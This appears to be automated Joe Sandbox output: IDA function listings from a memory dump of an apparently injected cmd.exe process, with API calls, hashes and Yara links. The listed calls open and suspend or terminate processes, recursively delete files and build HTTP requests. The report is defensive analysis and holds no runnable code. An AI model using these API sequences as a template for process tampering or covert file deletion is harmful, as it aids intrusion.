Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 99c6b5da7702f442493036b74ef2d09bdaab725d87c4b097cfa456ca1fe7ea4c
Instruction ID: 5621372480d32583b90595ba96b70fdfe8e06b1cbfc85eb111be938a2e1d231a
Opcode Fuzzy Hash: 99c6b5da7702f442493036b74ef2d09bdaab725d87c4b097cfa456ca1fe7ea4c
Instruction Fuzzy Hash: CAA001EA2EB3417C722CE297AE16E7F025CC8E1A22320897AF42198452B8801BC544B1

Uniqueness

Uniqueness Score: -1.00%

Function 03041D7E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03041D70

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 74143c018ec70d3306d6b97b47ea6f3d438e3fdd926f24427c97f81a3dbd9577
Instruction ID: 74cf031d1000796dfeca58f62a67d134d7814fc317ca955f66dc5a5694bb8d4b
Opcode Fuzzy Hash: 74143c018ec70d3306d6b97b47ea6f3d438e3fdd926f24427c97f81a3dbd9577
Instruction Fuzzy Hash: E4A001EA2AB242BC722CE297AE16E7F025CC8D5A61320897AE42288452B8801BC544B1

Uniqueness

Uniqueness Score: -1.00%

Function 03042405 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 9979ec23d843f23f0a82e5b003e9995c3dc2338d49d2dc073ba78ea51a6e4ad1
Instruction ID: c6c7f5222ff95967bf886f95e50967657e7bf9098e3718fd18783992b40f15be
Opcode Fuzzy Hash: 9979ec23d843f23f0a82e5b003e9995c3dc2338d49d2dc073ba78ea51a6e4ad1
Instruction Fuzzy Hash: C6A002DD66F1417C7158D1575D15E7F015DC4D59527304D79F41188051B4801B850075

Uniqueness

Uniqueness Score: -1.00%

Function 0304240F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 1b401387fdfc3f4f79cc11260f9dbd367240e399ef244652d69ccfe175450a39
Instruction ID: c6c7f5222ff95967bf886f95e50967657e7bf9098e3718fd18783992b40f15be
Opcode Fuzzy Hash: 1b401387fdfc3f4f79cc11260f9dbd367240e399ef244652d69ccfe175450a39
Instruction Fuzzy Hash: C6A002DD66F1417C7158D1575D15E7F015DC4D59527304D79F41188051B4801B850075

Uniqueness

Uniqueness Score: -1.00%

Function 0304242D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: bd7d3cde0f709b82da5678d17b4b7a85ab7aef5f2c4565d56781dc8587bfba91
Instruction ID: c6c7f5222ff95967bf886f95e50967657e7bf9098e3718fd18783992b40f15be
Opcode Fuzzy Hash: bd7d3cde0f709b82da5678d17b4b7a85ab7aef5f2c4565d56781dc8587bfba91
Instruction Fuzzy Hash: C6A002DD66F1417C7158D1575D15E7F015DC4D59527304D79F41188051B4801B850075

Uniqueness

Uniqueness Score: -1.00%

Function 03042441 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: f76319fe204a321aa47648a40608b20443ce0cf59756d24be0601348d3285fc6
Instruction ID: c6c7f5222ff95967bf886f95e50967657e7bf9098e3718fd18783992b40f15be
Opcode Fuzzy Hash: f76319fe204a321aa47648a40608b20443ce0cf59756d24be0601348d3285fc6
Instruction Fuzzy Hash: C6A002DD66F1417C7158D1575D15E7F015DC4D59527304D79F41188051B4801B850075

Uniqueness

Uniqueness Score: -1.00%

Function 0304244B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 75850c7354f63914521c5ebd43541caac06bea4e4c7cec740bbdb141c4617e2b
Instruction ID: c6c7f5222ff95967bf886f95e50967657e7bf9098e3718fd18783992b40f15be
Opcode Fuzzy Hash: 75850c7354f63914521c5ebd43541caac06bea4e4c7cec740bbdb141c4617e2b
Instruction Fuzzy Hash: C6A002DD66F1417C7158D1575D15E7F015DC4D59527304D79F41188051B4801B850075

Uniqueness

Uniqueness Score: -1.00%

Function 03042484 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03042491

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: d49afd4bc9ee8efc3f72b3357dea6768227fbcc6f3d3bad65eea1cb6d412df2e
Instruction ID: 91dfce889e001bfd75000f0a03bd2d9003808c60a2ce2473b3f1c26abe2bfc22
Opcode Fuzzy Hash: d49afd4bc9ee8efc3f72b3357dea6768227fbcc6f3d3bad65eea1cb6d412df2e
Instruction Fuzzy Hash: 66A001EE6AB6027C7118E2A3BE16E7F025CD4C1A623608ABAF421D8542A9801B8500B5

Uniqueness

Uniqueness Score: -1.00%

Function 030424A9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03042491

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 59465fc8c051a994d65322e073c41f38c9ea47e1ae894940571c3895f5fe2c41
Instruction ID: 320e3c4b72baad479cbb70be5c5ea6e41142f10c6e6b401f9e082968017997c8
Opcode Fuzzy Hash: 59465fc8c051a994d65322e073c41f38c9ea47e1ae894940571c3895f5fe2c41
Instruction Fuzzy Hash: A1A002ED66B5027C7118E1937E15D7F015CD4C59513604D79F411C8541A5801B450075

Uniqueness

Uniqueness Score: -1.00%

Function 0304020F Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,0303C525,03022B34,00000000,?,03047DA8,0303C525), ref: 0304021B

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 366f17a7cbe77c37cde785200565a9a60f902280f7dd68c11033947a8e451b26
Instruction ID: 2b21fd4924264f84b5dcfdbf21eb1515f3478e6c89ced0b3013f6161f37566d7
Opcode Fuzzy Hash: 366f17a7cbe77c37cde785200565a9a60f902280f7dd68c11033947a8e451b26
Instruction Fuzzy Hash: 2AB012BD001200BBDA11AF10EF04F097B21B750700F108411B24400068C3362530FF08

Uniqueness

Uniqueness Score: -1.00%

Function 0302C304 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0302DCFB: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0302DD47
Part of subcall function 0302DCFB: RegCloseKey.KERNELBASE(?,?,?,?,0302508A,?,?,?,?,?,00000001), ref: 0302DD8B

HeapFree.KERNEL32(00000000,?,?,00000000,?,?), ref: 0302C396

Part of subcall function 03023B26: memcpy.NTDLL(?,?,00000000,?,?,?,00000000), ref: 03023B49

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateCloseFreememcpy
String ID:
API String ID: 2041072108-0
Opcode ID: e98af1ad38e9f0d9c8c81b7f30e0d8dbc7cc2708c5c534e6d9b35281ddc091ae
Instruction ID: e7ad96e032cee118bf7ca1e28a4b373d9ee38ff958dbde048ce09d2e99d807be
Opcode Fuzzy Hash: e98af1ad38e9f0d9c8c81b7f30e0d8dbc7cc2708c5c534e6d9b35281ddc091ae
Instruction Fuzzy Hash: 2D11A7B9602211EBE755DF58D9C0FAE7FB9EB48200F144965F5059B240D7B4AD008B54

Uniqueness

Uniqueness Score: -1.00%

Function 030232E5 Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

GetLastError.KERNEL32(?,00000000,00001000,00000000,00001000), ref: 03023364

Part of subcall function 0304020F: RtlFreeHeap.NTDLL(00000000,0303C525,03022B34,00000000,?,03047DA8,0303C525), ref: 0304021B

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast
String ID:
API String ID: 3102831662-0
Opcode ID: f885bd1d301a7a4f4a505673b05a7b77a72c30156928874cbc27e73185e717a3
Instruction ID: f3797ac19d4065fcfd4faa2ca30b2d1c2a853c1992a22d10d15011bc4c555405
Opcode Fuzzy Hash: f885bd1d301a7a4f4a505673b05a7b77a72c30156928874cbc27e73185e717a3
Instruction Fuzzy Hash: B71177B9901319ABDB11EB98C844BAEFFF9FF81650F184099E554AB240DB78DB01CB94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03031577 Relevance: 19.7, APIs: 13, Instructions: 234filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

memset.NTDLL ref: 03031617
FindFirstFileW.KERNEL32(00000000,00000000), ref: 03031632
memset.NTDLL ref: 03031695
wcscpy.NTDLL ref: 030316A7
RtlEnterCriticalSection.NTDLL(?), ref: 03031703

Part of subcall function 0304020F: RtlFreeHeap.NTDLL(00000000,0303C525,03022B34,00000000,?,03047DA8,0303C525), ref: 0304021B

RtlLeaveCriticalSection.NTDLL(?), ref: 0303171F
FindNextFileW.KERNEL32(?,00000000), ref: 03031738
WaitForSingleObject.KERNEL32(00000000), ref: 0303174A
FindClose.KERNEL32(?), ref: 0303175F
FindFirstFileW.KERNEL32(00000000,00000000), ref: 03031773
FindNextFileW.KERNEL32(?,00000000), ref: 0303180B
WaitForSingleObject.KERNEL32(00000000), ref: 0303181D
FindClose.KERNEL32(?), ref: 03031838

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Find$File$CloseCriticalFirstHeapNextObjectSectionSingleWaitmemset$AllocateEnterFreeLeavewcscpy
String ID:
API String ID: 2408353863-0
Opcode ID: bc3ea6b55aad48d94e20c2e2829d89e41825b8b06e354035fd07de05da3222b5
Instruction ID: 055ed66e7da5c29772eea7ec1fa5ab179ea25f23437de64b3540bdd80320366f
Opcode Fuzzy Hash: bc3ea6b55aad48d94e20c2e2829d89e41825b8b06e354035fd07de05da3222b5
Instruction Fuzzy Hash: 5E8198B8506305AFC754FF64CD84A1BBBEDEF89300F084828F99596252DB78D915CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0303411F Relevance: 13.6, APIs: 9, Instructions: 117librarynativeloaderCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,?,?,?,030481A8,00000000,?,00000000,?,?), ref: 0303414C
GetLastError.KERNEL32 ref: 0303415A
NtSetInformationProcess.NTDLL ref: 030341AA
GetProcAddress.KERNEL32(?,00000000), ref: 030341EF
CloseHandle.KERNEL32(?), ref: 03034271

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Process$AddressCloseErrorHandleInformationLastOpenProc
String ID:
API String ID: 1788740162-0
Opcode ID: 3da080f1dcbb130fb1485999a509f052675bd5c06c7b001b2c76a5336a212248
Instruction ID: 787100fc4ee6ca6f882d51cd74de4c0b084848c9625cc736f314633655e65e93
Opcode Fuzzy Hash: 3da080f1dcbb130fb1485999a509f052675bd5c06c7b001b2c76a5336a212248
Instruction Fuzzy Hash: C44157B950A701AFD711EF6ADD04B6FBBECBF85304F044968F980AA160D378CA148B81

Uniqueness

Uniqueness Score: -1.00%

Function 03022299 Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 030222B1

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

FindFirstFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 0302231A
lstrlenW.KERNEL32(00000250,?,00000250,?,0000000A,00000208), ref: 03022342
RemoveDirectoryW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 03022394
DeleteFileW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 0302239F
FindNextFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 030223B2

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: ea596d03b039006605f7f315233a40141ee36ebf71d57e39a3cae0b9d4b7c76d
Instruction ID: 366afbe5083b1a13728bd00402034dc9b66cde14a9801d3719e93b2cb3c3ae73
Opcode Fuzzy Hash: ea596d03b039006605f7f315233a40141ee36ebf71d57e39a3cae0b9d4b7c76d
Instruction Fuzzy Hash: 1C4138B9802219EBDF91EFE4DD44AAEBFBDBF00310F1489A5E950A6190DB748B50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0302579B Relevance: 7.9, APIs: 6, Instructions: 401COMMON

Download Yara Rule

APIs

Part of subcall function 03038854: memset.NTDLL ref: 03038874

Part of subcall function 03038854: memset.NTDLL ref: 030389A9
Part of subcall function 03038854: memset.NTDLL ref: 030389BE

memcpy.NTDLL(?,?,0000011E), ref: 03025821
memset.NTDLL ref: 03025857
memset.NTDLL ref: 030258A5
memset.NTDLL ref: 03025924
memset.NTDLL ref: 03025993
memset.NTDLL ref: 03025A63

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: c1b7fe9f769a8ab72b3fc6a5caaa6cec32705768bc180fca28fb76d589cf5621
Instruction ID: 508c7466f91e48f7da600081d6af89f5efc109e7d078ccb786eb99ffa49c60c0
Opcode Fuzzy Hash: c1b7fe9f769a8ab72b3fc6a5caaa6cec32705768bc180fca28fb76d589cf5621
Instruction Fuzzy Hash: 7DF1D030902BA9CFCB31CF69C9856AAFBF4BF42310F244DADD5D796681D231AA45CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0302BDCE Relevance: 7.6, APIs: 5, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 03028845: GetModuleHandleA.KERNEL32(?,06092EE2), ref: 03028873
Part of subcall function 03028845: GetProcAddress.KERNEL32(00000000), ref: 0302887A
Part of subcall function 03028845: _strupr.NTDLL ref: 030288E8
Part of subcall function 03028845: lstrlen.KERNEL32(00000000,?,00000000,?,00000103), ref: 030288F0

TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 0302BE3F
NtSuspendProcess.NTDLL(00000000), ref: 0302BE5D
CloseHandle.KERNEL32(00000000), ref: 0302BE92
NtResumeProcess.NTDLL(00000000), ref: 0302BEAF

Part of subcall function 0303411F: OpenProcess.KERNEL32(001F0FFF,?,?,?,030481A8,00000000,?,00000000,?,?), ref: 0303414C
Part of subcall function 0303411F: GetLastError.KERNEL32 ref: 0303415A

CloseHandle.KERNEL32(00000000), ref: 0302BEB6

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Process$Handle$Close$AddressErrorLastModuleOpenProcResumeSuspendTerminate_struprlstrlen
String ID:
API String ID: 3638544337-0
Opcode ID: c320316ce7dd2f7593321a7d021bd1782f97126b6c0198977235e1b2ece04ad9
Instruction ID: 180233b3d4a6bab85a9c6bb15c8f2f2332f4b4e20fcd1178aa5f633d8fb6f6a3
Opcode Fuzzy Hash: c320316ce7dd2f7593321a7d021bd1782f97126b6c0198977235e1b2ece04ad9
Instruction Fuzzy Hash: 3C2103BA502325ABCF24EF64DD85BAE7BECFB44210F180815FB11D6145D734D9148BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0302154D Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 03021683

Part of subcall function 03037CC5: lstrlenW.KERNEL32(?,00000000,?,?,?,030215C8,?,?), ref: 03037CD2
Part of subcall function 03037CC5: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,030215C8,?,?), ref: 03037CFB
Part of subcall function 03037CC5: SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,030215C8,?,?), ref: 03037D43
Part of subcall function 03037CC5: LoadLibraryW.KERNELBASE(-0000FFFE,?,?,?,?,030215C8,?,?), ref: 03037D46

FindFirstFileW.KERNEL32(?,?,?,?), ref: 030215D9
FindNextFileW.KERNEL32(?,00000010), ref: 03021663
FindClose.KERNEL32(00000002), ref: 03021671

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

Part of subcall function 03030443: lstrlenW.KERNEL32(?,00000000,03043124,0304305C,?,?,?,0302164B,?,00000000,?), ref: 03030453
Part of subcall function 03030443: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,0302164B,?,00000000,?), ref: 03030475
Part of subcall function 03030443: lstrcpyW.KERNEL32(00000000,?), ref: 030304A1
Part of subcall function 03030443: lstrcatW.KERNEL32(00000000,?), ref: 030304B4

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Find$CurrentDirectoryFileLibrarylstrlen$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcatlstrcpy
String ID:
API String ID: 2325425509-0
Opcode ID: 8e0bfe53f8eeef7540f1a1b02018c56992e2e2d688534ceecc62d2011ed21ca5
Instruction ID: 94b925288f8314a790b7d860bbc44b0aa4e41f90646d14c9f3d6640c3a306a89
Opcode Fuzzy Hash: 8e0bfe53f8eeef7540f1a1b02018c56992e2e2d688534ceecc62d2011ed21ca5
Instruction Fuzzy Hash: 9241ACB500A316AFC701EF60DD48A6FFBE9FB88B04F08492DF594A2150D735DA19CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03030A13 Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?,?), ref: 03030A75
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 03030B11
lstrcpyn.KERNEL32(00000000,?,?), ref: 03030B26
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03030B41
StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,00000000,?,?,?), ref: 03030C28
StrChrA.SHLWAPI(00000001,00000020), ref: 03030C39
lstrlen.KERNEL32(00000000), ref: 03030C4D
memmove.NTDLL(?,?,00000001), ref: 03030C5D
lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 03030C89
RtlAllocateHeap.NTDLL(00000000,?), ref: 03030CAF
memcpy.NTDLL(00000000,?,?), ref: 03030CC3
memcpy.NTDLL(?,?,?), ref: 03030CE3
HeapFree.KERNEL32(00000000,?), ref: 03030D1F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03030DE5
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 03030E2D

Strings

OPTI, xrefs: 03030A4D
GET , xrefs: 03030C15
OPTI, xrefs: 03030C1D
POST, xrefs: 03030A46
PUT , xrefs: 03030A3F
GET , xrefs: 03030A38

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: GET $GET $OPTI$OPTI$POST$PUT
API String ID: 3227826163-647159250
Opcode ID: 4b0a2715a1969da15374b9294d3197f4bf09cc81f8eecaaa7e14414af27ab7af
Instruction ID: 8ee8aed407b37667f44f56781b6ce22540af77a2c53c1ecbc1a0fc3caa237dca
Opcode Fuzzy Hash: 4b0a2715a1969da15374b9294d3197f4bf09cc81f8eecaaa7e14414af27ab7af
Instruction Fuzzy Hash: F8E17C79A03205EFDB55DFA8CD84BAEBBB8FF05300F188599E9169B250C730EA50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0302D4F4 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0302D510
RtlAllocateHeap.NTDLL(00000000,?), ref: 0302D52C
GetLastError.KERNEL32 ref: 0302D57B
HeapFree.KERNEL32(00000000,00000000), ref: 0302D591
RtlAllocateHeap.NTDLL(00000000,?), ref: 0302D5A5
GetLastError.KERNEL32 ref: 0302D5BF
GetLastError.KERNEL32 ref: 0302D5F2
HeapFree.KERNEL32(00000000,00000000), ref: 0302D610
lstrlenW.KERNEL32(00000000,?), ref: 0302D63C
RtlAllocateHeap.NTDLL(00000000,?), ref: 0302D651
DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 0302D725
HeapFree.KERNEL32(00000000,?), ref: 0302D734
WaitForSingleObject.KERNEL32(00000000), ref: 0302D749
HeapFree.KERNEL32(00000000,00000000), ref: 0302D75C
HeapFree.KERNEL32(00000000,?), ref: 0302D76E
RtlExitUserThread.NTDLL(?,?), ref: 0302D783

Strings

, xrefs: 0302D635

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
String ID:
API String ID: 3853681310-3916222277
Opcode ID: aaa2977d4f8cad033d0950b1b00315985c7e5a22980f438edb6209c2fad021c0
Instruction ID: 231d9affb58abbc4018cdead2007467afafcba86cc7746a2371f85c88537a05b
Opcode Fuzzy Hash: aaa2977d4f8cad033d0950b1b00315985c7e5a22980f438edb6209c2fad021c0
Instruction Fuzzy Hash: 81816AB9902229EFDB10EFA4DD88EAE7BFCFB09204F04456AE51093214D7799E01DB60

Uniqueness

Uniqueness Score: -1.00%

Function 030323C9 Relevance: 25.9, APIs: 17, Instructions: 440synchronizationthreadCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(03047B20,03047070,00000010), ref: 03032422

Part of subcall function 0303853A: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?,?,?,?), ref: 0303856E
Part of subcall function 0303853A: GetLastError.KERNEL32(?,?,?,00000000,?,?,?,?,?,?), ref: 0303862F
Part of subcall function 0303853A: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?), ref: 03038638

RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0303297F

Part of subcall function 0303BF9A: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0303BFB4
Part of subcall function 0303BF9A: CreateWaitableTimerA.KERNEL32(03048208,00000003,?), ref: 0303BFD1
Part of subcall function 0303BF9A: GetLastError.KERNEL32(?,?,030385A2,?,?,?,00000000,?,?,?,?,?,?), ref: 0303BFE2
Part of subcall function 0303BF9A: GetSystemTimeAsFileTime.KERNEL32(?,00000000,030385A2,?,?,?,030385A2,?), ref: 0303C022
Part of subcall function 0303BF9A: SetWaitableTimer.KERNEL32(00000000,030385A2,00000000,00000000,00000000,00000000,?,?,030385A2,?), ref: 0303C041
Part of subcall function 0303BF9A: HeapFree.KERNEL32(00000000,030385A2,00000000,030385A2,?,?,?,030385A2,?), ref: 0303C057

StrChrA.SHLWAPI(030480F0,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 03032548
StrTrimA.SHLWAPI(030480F0,?), ref: 0303256A
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 030325AA

Part of subcall function 03038EFC: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 03038F20
Part of subcall function 03038EFC: wsprintfA.USER32 ref: 03038F84

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 03032642

Part of subcall function 0304036C: WaitForSingleObject.KERNEL32(03032664,00000000,00000000,?,?,?,03032664,?), ref: 03040378
Part of subcall function 0304036C: HeapFree.KERNEL32(00000000,?,?,?,?,?,03032664,?), ref: 030403A6
Part of subcall function 0304036C: ResetEvent.KERNEL32(03032664,?,?,?,03032664,?), ref: 030403C0

_allmul.NTDLL(00000000,FF676980,000000FF), ref: 030326C7
_allmul.NTDLL(03047AE8,00000000,FF676980,000000FF), ref: 0303272C
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0303275C
ReleaseMutex.KERNEL32(?), ref: 03032779
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 030327F9
SwitchToThread.KERNEL32 ref: 03032815
ReleaseMutex.KERNEL32(?), ref: 0303281F
